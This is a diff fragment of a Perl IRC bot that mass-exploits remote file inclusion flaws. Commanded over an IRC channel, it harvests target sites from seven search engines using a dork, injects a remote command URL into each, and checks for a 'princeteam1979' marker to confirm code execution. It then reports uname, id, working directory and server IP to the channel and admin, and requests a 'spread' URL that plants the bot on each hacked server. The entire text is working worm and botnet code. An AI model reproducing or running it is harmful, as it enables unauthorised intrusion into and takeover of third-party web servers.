+            else {
+                my $bug       = $1;
+                my $dork      = $2;
+                my $contatore = 0;
+                my %hosts;
+     
+                my @google = &googlet($dork);
+                push( my @tot, @google );
+                my @puliti = &unici(@tot);
+                display( $dsp,"PRIVMSG $channel :7[3ScaN7] 12G4o4o12g9l4e PASS 12[]8[]4[]  ".scalar(@tot)."3 for exploited.... 4".scalar(@puliti)."3 => 4$dork");
+                my $uni = scalar(@puliti);
+
+                foreach my $site (@puliti) {
+                    $contatore++;
+                    if ( $contatore % 100 == 0 ) {
+                    }
+                    if ( $contatore == $uni - 1 ) {
+                        display( $dsp,"PRIVMSG $channel :7[3ScaN7] 12G4o8o12g9l4e PASS FINISHED 7for 4$dork 12[]8[]4[]");						}
+                    my $test  = "http://".$site.$bug.$id."?";
+                    my $print = "http://".$site.$bug.$printcmd."?";
+                    my $req   = HTTP::Request->new( GET => $test );
+                    my $ua    = LWP::UserAgent->new();
+                    $ua->timeout(5);
+                    my $response = $ua->request($req);
+                    if ( $response->is_success ) {
+                        my $re = $response->content;
+                        if ( $re =~ /princeteam1979/ && $re =~ /uid=/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4 PASS] Result...");
+                                display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4 PASS] Uptime: $up");
+                                display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4 PASS] Uname -a: $un");
+                                display( $dsp,"PRIVMSG $admin   :4[12G4o4o12g9l4e4 PASS] Uname -a: $un");
+                                display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4 PASS] Id: $id1");
+                                display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4 PASS] Pwd: $pwd1");
+                                display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4 PASS] Server Ip: $ip1");
+                                display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4 PASS] Server Name: $name1");
+                                display( $dsp,"PRIVMSG $admin   :4[12G4o4o12g9l4e4 PASS] Safe: $print");
+                                display( $dsp,"PRIVMSG $chanres :4[12G4o4o12g9l4e4 PASS] Safe Mode OFF: $print");
+                                my $test2 ="http://".$site.$bug.$spread."?";
+                                my $reqz = HTTP::Request->new( GET => $test2 );
+                                my $ua = LWP::UserAgent->new();
+                                my $response = $ua->request($reqz);
+                            }
+                        }
+                        elsif ( $re =~ /princeteam1979/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4 PASS] Result...");
+                                display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4 PASS] Safe Mode ON: $print");
+                                display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4 PASS] Uname -a: $un");
+                                display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4 PASS] Server Ip: $ip1");
+                                display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4 PASS] Server Name $name1");
+                                display( $dsp,"PRIVMSG $chanres :4[12G4o4o12g9l4e4 PASS] Safe Mode ON: $print");
+                                my $test2 ="http://".$site.$bug.$spread."?";
+                                my $reqz = HTTP::Request->new( GET => $test2 );
+                                my $ua = LWP::UserAgent->new();
+                                my $response = $ua->request($reqz);
+
+							}
+                        }
+                    }
+                }
+            }
+            exit;
+        }
+    }
+
+    if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
+        if ( my $pid = fork ) {
+            waitpid( $pid, 0 );
+        }
+        else {
+            if (fork) {
+                exit;
+            }
+            else {
+                my $bug       = $1;
+                my $dork      = $2;
+                my $contatore = 0;
+                my %hosts;
+                my @alltheweb = &alltheweb($dork);
+                push( my @tot, @alltheweb );
+                my @puliti = &unici(@tot);
+                 display( $dsp,"PRIVMSG $channel :7[3$channel7] 12A7l8l3THE12W9e4B 12[]8[]4[] ".scalar(@tot)."3 for exploited... 4 ".scalar(@puliti)."3 =>  4$dork");
+				 my $uni = scalar(@puliti);
+				
+                foreach my $site (@puliti) {
+                    $contatore++;
+                    if ( $contatore % 100 == 0 ) {
+                    }
+                    if ( $contatore == $uni - 1 ) {
+                    display( $dsp,"PRIVMSG $channel :7[3$channel7] 12A7l8l3THE12W9e4B 4FINISHED 7for 4$dork 12[]8[]4[]");
+                    }
+                    my $test  = "http://".$site.$bug.$id."?";
+                    my $print = "http://".$site.$bug.$pritcmd."?";
+                    my $req   = HTTP::Request->new( GET => $test );
+                    my $ua    = LWP::UserAgent->new();
+                    $ua->timeout(5);
+                    my $response = $ua->request($req);
+                    if ( $response->is_success ) {
+                        my $re = $response->content;
+                        if ( $re =~ /princeteam1979/ && $re =~ /uid=/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,"PRIVMSG $channel :4[12A7l8l3THE12W9e4B] Result...");
+                                display( $dsp,"PRIVMSG $channel :4[12A7l8l3THE12W9e4B] Uptime: $up");
+                                display( $dsp,"PRIVMSG $channel :4[12A7l8l3THE12W9e4B] Uname -a: $un");
+                                display( $dsp,"PRIVMSG $admin   :4[12A7l8l3THE12W9e4B] Uname -a: $un");
+                                display( $dsp,"PRIVMSG $channel :4[12A7l8l3THE12W9e4B] Id: $id1");
+                                display( $dsp,"PRIVMSG $channel :4[12A7l8l3THE12W9e4B] Pwd: $pwd1");
+                                display( $dsp,"PRIVMSG $channel :4[12A7l8l3THE12W9e4B] Server Ip: $ip1");
+                                display( $dsp,"PRIVMSG $channel :4[12A7l8l3THE12W9e4B] Server Name: $name1");
+                                display( $dsp,"PRIVMSG $admin   :4[12A7l8l3THE12W9e4B] Safe: $print");
+                                display( $dsp,"PRIVMSG $chanres :4[12A7l8l3THE12W9e4B] Safe Mode OFF: $print");
+                                my $test2 ="http://".$site.$bug.$spread."?";
+                                my $reqz = HTTP::Request->new( GET => $test2 );
+                                my $ua = LWP::UserAgent->new();
+                                my $response = $ua->request($reqz);
+                            }
+                        }
+                        elsif ( $re =~ /princeteam1979/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,"PRIVMSG $channel :4[12A7l8l3THE12W9e4B] Result...");
+                                display( $dsp,"PRIVMSG $channel :4[12A7l8l3THE12W9e4B] Safe Mode ON: $print");
+                                display( $dsp,"PRIVMSG $channel :4[12A7l8l3THE12W9e4B] Uname -a: $un");
+                                display( $dsp,"PRIVMSG $channel :4[12A7l8l3THE12W9e4B] Server Ip: $ip1");
+                                display( $dsp,"PRIVMSG $channel :4[12A7l8l3THE12W9e4B] Server Name $name1");
+                                display( $dsp,"PRIVMSG $chanres :4[12A7l8l3THE12W9e4B] Safe Mode ON: $print");
+                                my $test2 ="http://".$site.$bug.$spread."?";
+                                my $reqz = HTTP::Request->new( GET => $test2 );
+                                my $ua = LWP::UserAgent->new();
+                                my $response = $ua->request($reqz);
+
+								}
+                        }
+                    }
+                }
+            }
+            exit;
+        }
+    }
+
+    if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
+        if ( my $pid = fork ) {
+            waitpid( $pid, 0 );
+        }
+        else {
+            if (fork) {
+                exit;
+            }
+            else {
+                my $bug       = $1;
+                my $dork      = $2;
+                my $contatore = 0;
+                my %hosts;
+                my @uol = &uolsub($dork);
+                push( my @tot, @uol );
+                my @puliti = &unici(@tot);
+                 display( $dsp,"PRIVMSG $channel :7[3$channel7] 7U3O7L 12[]8[]4[] ".scalar(@tot)."3 for exploited... 4 ".scalar(@puliti)."3 =>  4$dork");
+				 my $uni = scalar(@puliti);
+                foreach my $site (@puliti) {
+                    $contatore++;
+                    if ( $contatore % 100 == 0 ) {
+                    }
+                    if ( $contatore == $uni - 1 ) {
+                    display( $dsp,"PRIVMSG $channel :7[3$channel7] 7U3O7L 4FINISHED 7for 4$dork 12[]8[]4[]");
+                    }
+                    my $test  = "http://".$site.$bug.$id."?";
+                    my $print = "http://".$site.$bug.$printcmd."?";
+                    my $req   = HTTP::Request->new( GET => $test );
+                    my $ua    = LWP::UserAgent->new();
+                    $ua->timeout(5);
+                    my $response = $ua->request($req);
+                    if ( $response->is_success ) {
+                        my $re = $response->content;
+                        if ( $re =~ /princeteam1979/ && $re =~ /uid=/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,"PRIVMSG $channel :4[7U3O7L4] Result...");
+                                display( $dsp,"PRIVMSG $channel :4[7U3O7L4] Uptime: $up");
+                                display( $dsp,"PRIVMSG $channel :4[7U3O7L4] Uname -a: $un");
+                                display( $dsp,"PRIVMSG $admin   :4[7U3O7L4] Uname -a: $un");
+                                display( $dsp,"PRIVMSG $channel :4[7U3O7L4] Id: $id1");
+                                display( $dsp,"PRIVMSG $channel :4[7U3O7L4] Pwd: $pwd1");
+                                display( $dsp,"PRIVMSG $channel :4[7U3O7L4] Server Ip: $ip1");
+                                display( $dsp,"PRIVMSG $channel :4[7U3O7L4] Server Name: $name1");
+                                display( $dsp,"PRIVMSG $admin   :4[7U3O7L4] Safe: $print");
+                                display( $dsp,"PRIVMSG $chanres :4[7U3O7L4] Safe Mode OFF: $print");
+								my $test2 ="http://".$site.$bug.$spread."?";
+                                my $reqz = HTTP::Request->new( GET => $test2 );
+                                my $ua = LWP::UserAgent->new();
+                                my $response = $ua->request($reqz);
+                            }
+                        }
+                        elsif ( $re =~ /princeteam1979/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,"PRIVMSG $channel :4[7U3O7L4] Result...");
+                                display( $dsp,"PRIVMSG $channel :4[7U3O7L4] Safe Mode ON: $print");
+                                display( $dsp,"PRIVMSG $channel :4[7U3O7L4] Uname -a: $un");
+                                display( $dsp,"PRIVMSG $channel :4[7U3O7L4] Server Ip: $ip1");
+                                display( $dsp,"PRIVMSG $channel :4[7U3O7L4] Server Name $name1");
+                                display( $dsp,"PRIVMSG $chanres :4[7U3O7L4] Safe Mode ON: $print");
+                                my $test2 ="http://".$site.$bug.$spread."?";
+                                my $reqz = HTTP::Request->new( GET => $test2 );
+                                my $ua = LWP::UserAgent->new();
+                                my $response = $ua->request($reqz);
+
+                            }
+                        }
+                    }
+                }
+            }
+            exit;
+        }
+    }
+
+    if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
+        if ( my $pid = fork ) {
+            waitpid( $pid, 0 );
+        }
+        else {
+            if (fork) {
+                exit;
+            }
+            else {
+                my $bug       = $1;
+                my $dork      = $2;
+                my $contatore = 0;
+                my %hosts;
+                my @altavista   = &altavista($dork);
+                push( my @tot, @allist, @alldeist, @allistus );
+                my @puliti = &unici(@tot);
+                display( $dsp,"PRIVMSG $channel :7[3$channel7] 7Al13tav3ista 12[]8[]4[] ".scalar(@tot)."3 for exploited... 4 ".scalar(@puliti)."3 =>  4$dork");
+				my $uni = scalar(@puliti);
+
+                foreach my $site (@puliti) {
+                    $contatore++;
+                    if ( $contatore % 100 == 0 ) {
+                    }
+                    if ( $contatore == $uni - 1 ) {
+                    display( $dsp,"PRIVMSG $channel :7[3$channel7] 7Al13tav3ista 4FINISHED 7for 4$dork 12[]8[]4[]");
+                    }
+                    my $test  = "http://".$site.$bug.$id."?";
+                    my $print = "http://".$site.$bug.$printcmd."?";
+                    my $req   = HTTP::Request->new( GET => $test );
+                    my $ua    = LWP::UserAgent->new();
+                    $ua->timeout(5);
+                    my $response = $ua->request($req);
+                    if ( $response->is_success ) {
+                        my $re = $response->content;
+                        if ( $re =~ /princeteam1979/ && $re =~ /uid=/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,"PRIVMSG $channel :4[7Al13tav3ista4] Result...");
+                                display( $dsp,"PRIVMSG $channel :4[7Al13tav3ista4] Uptime: $up");
+                                display( $dsp,"PRIVMSG $channel :4[7Al13tav3ista4] Uname -a: $un");
+                                display( $dsp,"PRIVMSG $admin   :4[7Al13tav3ista4] Uname -a: $un");
+                                display( $dsp,"PRIVMSG $channel :4[7Al13tav3ista4] Id: $id1");
+                                display( $dsp,"PRIVMSG $channel :4[7Al13tav3ista4] Pwd: $pwd1");
+                                display( $dsp,"PRIVMSG $channel :4[7Al13tav3ista4] Server Ip: $ip1");
+                                display( $dsp,"PRIVMSG $channel :4[7Al13tav3ista4] Server Name: $name1");
+                                display( $dsp,"PRIVMSG $admin   :4[7Al13tav3ista4] Safe: $print");
+                                display( $dsp,"PRIVMSG $chanres :4[7Al13tav3ista4] Safe Mode OFF: $print");
+                                my $test2 ="http://".$site.$bug.$spread."?";
+                                my $reqz = HTTP::Request->new( GET => $test2 );
+                                my $ua = LWP::UserAgent->new();
+                                my $response = $ua->request($reqz);
+                            }
+                        }
+                        elsif ( $re =~ /princeteam1979/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x);
+                                sleep(4);
+                                display( $dsp,"PRIVMSG $channel :4[7Al13tav3ista4] Result...");
+                                display( $dsp,"PRIVMSG $channel :4[7Al13tav3ista4] Safe Mode ON: $print");
+                                display( $dsp,"PRIVMSG $channel :4[7Al13tav3ista4] Uname -a: $un");
+                                display( $dsp,"PRIVMSG $channel :4[7Al13tav3ista4] Server Ip: $ip1");
+                                display( $dsp,"PRIVMSG $channel :4[7Al13tav3ista4] Server Name $name1");
+                                display( $dsp,"PRIVMSG $chanres :4[7Al13tav3ista4] Safe Mode ON: $print");
+                                  my $test2 ="http://".$site.$bug.$spread."?";
+                                my $reqz = HTTP::Request->new( GET => $test2 );
+                                my $ua = LWP::UserAgent->new();
+                                my $response = $ua->request($reqz);
+
+                          }
+                        }
+                    }
+                }
+            }
+            exit;
+        }
+    }
+
+    if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
+        if ( my $pid = fork ) {
+            waitpid( $pid, 0 );
+        }
+        else {
+            if (fork) {
+                exit;
+            }
+            else {
+                my $bug       = $1;
+                my $dork      = $2;
+                my $contatore = 0;
+                my %hosts;
+                my @searchlist = &search($dork);
+                my @search2    = &searchs($dork);
+                push( my @tot, @searchlist, @search2 );
+                my @puliti = &unici(@tot);
+                display( $dsp,"PRIVMSG $channel :7[3$channel7] 4S6E7A12R4C3H 12[]8[]4[] ".scalar(@tot)."3 for exploited... 4 ".scalar(@puliti)."3 =>  4$dork");
+                my $uni = scalar(@puliti);
+
+                foreach my $site (@puliti) {
+                    $contatore++;
+                    if ( $contatore % 100 == 0 ) {
+                    }
+                    if ( $contatore == $uni - 1 ) {
+                    display( $dsp,"PRIVMSG $channel :7[3$channel7] 4S6E7A12R4C3H 4FINISHED 7for 4$dork 12[]8[]4[]");
+                    }
+                    my $test  = "http://".$site.$bug.$id."?";
+                    my $print = "http://".$site.$bug.$printcmd."?";
+                    my $req   = HTTP::Request->new( GET => $test );
+                    my $ua    = LWP::UserAgent->new();
+                    $ua->timeout(5);
+                    my $response = $ua->request($req);
+                    if ( $response->is_success ) {
+                        my $re = $response->content;
+                        if ( $re =~ /princeteam1979/ && $re =~ /uid=/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,"PRIVMSG $channel :4[4S6E7A12R4C3H4] Result...");
+                                display( $dsp,"PRIVMSG $channel :4[4S6E7A12R4C3H4] Uptime: $up");
+                                display( $dsp,"PRIVMSG $channel :4[4S6E7A12R4C3H4] Uname -a: $un");
+                                display( $dsp,"PRIVMSG $admin   :4[4S6E7A12R4C3H4] Uname -a: $un");
+                                display( $dsp,"PRIVMSG $channel :4[4S6E7A12R4C3H4] Id: $id1");
+                                display( $dsp,"PRIVMSG $channel :4[4S6E7A12R4C3H4] Pwd: $pwd1");
+                                display( $dsp,"PRIVMSG $channel :4[4S6E7A12R4C3H4] Server Ip: $ip1");
+                                display( $dsp,"PRIVMSG $channel :4[4S6E7A12R4C3H4] Server Name: $name1");
+                                display( $dsp,"PRIVMSG $admin   :4[4S6E7A12R4C3H4] Safe: $print");
+                                display( $dsp,"PRIVMSG $chanres :4[4S6E7A12R4C3H4] Safe Mode OFF: $print");
+                                my $test2 ="http://" . $site . $bug . $spread . "?";
+                                my $reqz = HTTP::Request->new( GET => $test2 );
+                                my $ua = LWP::UserAgent->new();
+                                my $response = $ua->request($reqz);
+                            }
+                        }
+                        elsif ( $re =~ /princeteam1979/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,"PRIVMSG $channel :4[4S6E7A12R4C3H4] Result...");
+                                display( $dsp,"PRIVMSG $channel :4[4S6E7A12R4C3H4] Safe Mode ON: $print");
+                                display( $dsp,"PRIVMSG $channel :4[4S6E7A12R4C3H4] Uname -a: $un");
+                                display( $dsp,"PRIVMSG $channel :4[4S6E7A12R4C3H4] Server Ip: $ip1");
+                                display( $dsp,"PRIVMSG $channel :4[4S6E7A12R4C3H4] Server Name $name1");
+                                display( $dsp,"PRIVMSG $chanres :4[4S6E7A12R4C3H4] Safe Mode ON: $print");
+                                my $test2 ="http://".$site.$bug.$spread."?";
+                                my $reqz = HTTP::Request->new( GET => $test2 );
+                                my $ua = LWP::UserAgent->new();
+                                my $response = $ua->request($reqz);
+
+								}
+                        }
+                    }
+                }
+            }
+            exit;
+        }
+    }
+
+    if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
+        if ( my $pid = fork ) {
+            waitpid( $pid, 0 );
+        }
+        else {
+            if (fork) {
+                exit;
+            }
+            else {
+                my $bug       = $1;
+                my $dork      = $2;
+                my $contatore = 0;
+                my %hosts;
+                my @mlist = &msn($dork);
+                push( my @tot, @mlist );
+                my @puliti = &unici(@tot);
+                display( $dsp,"PRIVMSG $channel :7[3$channel7] 7M4S7N 12[]8[]4[] ".scalar(@tot)."3 for exploited... 4 ".scalar(@puliti)."3 =>  4$dork"); 
+				my $uni = scalar(@puliti);
+                foreach my $site (@puliti) {
+                    $contatore++;
+                    if ( $contatore % 100 == 0 ) {
+                    }
+                    if ( $contatore == $uni - 1 ) {
+                    display( $dsp,"PRIVMSG $channel :7[3$channel7] 7M4S7N 4FINISHED 7for 4$dork 12[]8[]4[]");
+                    }
+                    my $test  = "http://".$site.$bug.$id."?";
+                    my $print = "http://".$site.$bug.$printcmd."?";
+                    my $req   = HTTP::Request->new( GET => $test );
+                    my $ua    = LWP::UserAgent->new();
+                    $ua->timeout(5);
+                    my $response = $ua->request($req);
+                    if ( $response->is_success ) {
+                        my $re = $response->content;
+                        if ( $re =~ /princeteam1979/ && $re =~ /uid=/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,"PRIVMSG $channel :4[7M4S7N4] Result...");
+                                display( $dsp,"PRIVMSG $channel :4[7M4S7N4] Uptime: $up");
+                                display( $dsp,"PRIVMSG $channel :4[7M4S7N4] Uname -a: $un");
+                                display( $dsp,"PRIVMSG $admin   :4[7M4S7N4] Uname -a: $un");
+                                display( $dsp,"PRIVMSG $channel :4[7M4S7N4] Id: $id1");
+                                display( $dsp,"PRIVMSG $channel :4[7M4S7N4] Pwd: $pwd1");
+                                display( $dsp,"PRIVMSG $channel :4[7M4S7N4] Server Ip: $ip1");
+                                display( $dsp,"PRIVMSG $channel :4[7M4S7N4] Server Name: $name1");
+                                display( $dsp,"PRIVMSG $admin   :4[7M4S7N4] Safe: $print");
+                                display( $dsp,"PRIVMSG $chanres :4[7M4S7N4] Safe Mode OFF: $print"); 
+								my $test2 ="http://".$site.$bug.$spread."?";
+                                my $reqz = HTTP::Request->new( GET => $test2 );
+                                my $ua = LWP::UserAgent->new();
+                                my $response = $ua->request($reqz);
+                            }
+                        }
+                        elsif ( $re =~ /princeteam1979/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,"PRIVMSG $channel :4[7M4S7N4] Result...");
+                                display( $dsp,"PRIVMSG $channel :4[7M4S7N4] Safe Mode ON: $print");
+                                display( $dsp,"PRIVMSG $channel :4[7M4S7N4] Uname -a: $un");
+                                display( $dsp,"PRIVMSG $channel :4[7M4S7N4] Server Ip: $ip1");
+                                display( $dsp,"PRIVMSG $channel :4[7M4S7N4] Server Name $name1");
+                                display( $dsp,"PRIVMSG $chanres :4[7M4S7N4] Safe Mode ON: $print");
+                                 my $test2 ="http://".$site.$bug.$spread."?";
+                                my $reqz = HTTP::Request->new( GET => $test2 );
+                                my $ua = LWP::UserAgent->new();
+                                my $response = $ua->request($reqz);
+ }
+                        }
+                    }
+                }
+            }
+            exit;
+        }
+    }
+
+    if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
+        if ( my $pid = fork ) {
+            waitpid( $pid, 0 );
+        }
+        else {
+            if (fork) {
+                exit;
+            }
+            else {
+                my $bug       = $1;
+                my $dork      = $2;
+                my $contatore = 0;
+                my %hosts;
+                my @asklist = &ask($dork);
+                push( my @tot, @asklist );
+                my @puliti = &unici(@tot);
+                display( $dsp,"PRIVMSG $channel :7[3$channel7] 14A4S14K 12[]8[]4[] ".scalar(@tot)."3 for exploited... 4 ".scalar(@puliti)."3 =>  4$dork");
+                my $uni = scalar(@puliti);
+
+                foreach my $site (@puliti) {
+                    $contatore++;
+                    if ( $contatore % 100 == 0 ) {
+                    }
+                    if ( $contatore == $uni - 1 ) {
+                    display( $dsp,"PRIVMSG $channel :7[3$channel7] 14A4S14K 4FINISHED 7for 4$dork 12[]8[]4[]");
+                    }
+                    my $test  = "http://".$site.$bug.$id."?";
+                    my $print = "http://".$site.$bug.$printcmd."?";
+                    my $req   = HTTP::Request->new( GET => $test );
+                    my $ua    = LWP::UserAgent->new();
+                    $ua->timeout(5);
+                    my $response = $ua->request($req);
+                    if ( $response->is_success ) {
+                        my $re = $response->content;
+                        if ( $re =~ /princeteam1979/ && $re =~ /uid=/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,"PRIVMSG $channel :4[14A4S14K4] Result...");
+                                display( $dsp,"PRIVMSG $channel :4[14A4S14K4] Uptime: $up");
+                                display( $dsp,"PRIVMSG $channel :4[14A4S14K4] Uname -a: $un");
+                                display( $dsp,"PRIVMSG $admin   :4[14A4S14K4] Uname -a: $un");
+                                display( $dsp,"PRIVMSG $channel :4[14A4S14K4] Id: $id1");
+                                display( $dsp,"PRIVMSG $channel :4[14A4S14K4] Pwd: $pwd1");
+                                display( $dsp,"PRIVMSG $channel :4[14A4S14K4] Server Ip: $ip1");
+                                display( $dsp,"PRIVMSG $channel :4[14A4S14K4] Server Name: $name1");
+                                display( $dsp,"PRIVMSG $admin   :4[14A4S14K4] Safe: $print");
+                                display( $dsp,"PRIVMSG $chanres :4[14A4S14K4] Safe Mode OFF: $print"); 
+                                my $test2 ="http://".$site.$bug.$spread."?";
+                                my $reqz = HTTP::Request->new( GET => $test2 );
+                                my $ua = LWP::UserAgent->new();
+                                my $response = $ua->request($reqz);
+                            }
+                        }
+                        elsif ( $re =~ /princeteam1979/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,"PRIVMSG $channel :4[14A4S14K4] Result...");
+                                display( $dsp,"PRIVMSG $channel :4[14A4S14K4] Safe Mode ON: $print");
+                                display( $dsp,"PRIVMSG $channel :4[14A4S14K4] Uname -a: $un");
+                                display( $dsp,"PRIVMSG $channel :4[14A4S14K4] Server Ip: $ip1");
+                                display( $dsp,"PRIVMSG $channel :4[14A4S14K4] Server Name $name1");
+                                display( $dsp,"PRIVMSG $chanres :4[14A4S14K4] Safe Mode ON: $print");
+                                my $test2 ="http://".$site.$bug.$spread."?";
+                                my $reqz = HTTP::Request->new( GET => $test2 );
+                                my $ua = LWP::UserAgent->new();
+                                my $response = $ua->request($reqz);
+ 
+ }
+                        }
+                    }
+                }
+            }
+            exit;
+        }
+    }
+
+    if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
+        if ( my $pid = fork ) {
+            waitpid( $pid, 0 );
+        }
+        else {
+            if (fork) {
+                exit;
+            }
+            else {
+                my $bug       = $1;
+                my $dork      = $2;
+                my $contatore = 0;
+                my %hosts;
+                my @fireball = fireball($dork);
+                push( my @tot, @fireball );
+                my @puliti = &unici(@tot);
+                display( $dsp,"PRIVMSG $channel :7[3$channel7] 4F3i6r7e4B7a12ll 12[]8[]4[] ".scalar(@tot)."3 for exploited... 4 ".scalar(@puliti)."3 =>  4$dork");
+               my $uni = scalar(@puliti);
+
+                foreach my $site (@puliti) {
+                    $contatore++;
+                    if ( $contatore % 100 == 0 ) {
+                    }
+                    if ( $contatore == $uni - 1 ) {
+                    display( $dsp,"PRIVMSG $channel :7[3$channel7] 4F3i6r7e4B7a12ll 4FINISHED 7for 4$dork 12[]8[]4[]");
+                    }
+                    my $test  = "http://".$site.$bug.$id."?";
+                    my $print = "http://".$site.$bug.$printcmd."?";
+                    my $req   = HTTP::Request->new( GET => $test );
+                    my $ua    = LWP::UserAgent->new();
+                    $ua->timeout(5);
+                    my $response = $ua->request($req);
+                    if ( $response->is_success ) {
+                        my $re = $response->content;
+                        if ( $re =~ /princeteam1979/ && $re =~ /uid=/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,"PRIVMSG $channel :4[4F3i6r7e4B7a12ll4] Result...");
+                                display( $dsp,"PRIVMSG $channel :4[4F3i6r7e4B7a12ll4] Uptime: $up");
+                                display( $dsp,"PRIVMSG $channel :4[4F3i6r7e4B7a12ll4] Uname -a: $un");
+                                display( $dsp,"PRIVMSG $admin   :4[4F3i6r7e4B7a12ll4] Uname -a: $un");
+                                display( $dsp,"PRIVMSG $channel :4[4F3i6r7e4B7a12ll4] Id: $id1");
+                                display( $dsp,"PRIVMSG $channel :4[4F3i6r7e4B7a12ll4] Pwd: $pwd1");
+                                display( $dsp,"PRIVMSG $channel :4[4F3i6r7e4B7a12ll4] Server Ip: $ip1");
+                                display( $dsp,"PRIVMSG $channel :4[4F3i6r7e4B7a12ll4] Server Name: $name1");
+                                display( $dsp,"PRIVMSG $admin   :4[4F3i6r7e4B7a12ll4] Safe: $print");
+                                display( $dsp,"PRIVMSG $chanres :4[4F3i6r7e4B7a12ll4] Safe Mode OFF: $print"); 
+                                my $test2 ="http://".$site.$bug.$spread."?";
+                                my $reqz = HTTP::Request->new( GET => $test2 );
+                                my $ua = LWP::UserAgent->new();
+                                my $response = $ua->request($reqz);
+                            }
+                        }
+                        elsif ( $re =~ /princeteam1979/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,"PRIVMSG $channel :4[4F3i6r7e4B7a12ll4] Result...");
+                                display( $dsp,"PRIVMSG $channel :4[4F3i6r7e4B7a12ll4] Safe Mode ON: $print");
+                                display( $dsp,"PRIVMSG $channel :4[4F3i6r7e4B7a12ll4] Uname -a: $un");
+                                display( $dsp,"PRIVMSG $channel :4[4F3i6r7e4B7a12ll4] Server Ip: $ip1");
+                                display( $dsp,"PRIVMSG $channel :4[4F3i6r7e4B7a12ll4] Server Name $name1");
+                                display( $dsp,"PRIVMSG $chanres :4[4F3i6r7e4B7a12ll4] Safe Mode ON: $print");
+                                my $test2 ="http://".$site.$bug.$spread."?";
+                                my $reqz = HTTP::Request->new( GET => $test2 );
+                                my $ua = LWP::UserAgent->new();
+                                my $response = $ua->request($reqz);
+
+							}
+                        }
+                    }
+                }
+            }
+            exit;
+        }
+    }
+}
+
+sub display() {
+    if ( $#_ == '1' ) {
+        my $dsp = $_[0];
+        print $dsp "$_[1]\n";
+    }
+    else {
+        print $dsp "$_[0]\n";
+    }
+}
+
+sub os() {
+    my $site = $_[0];
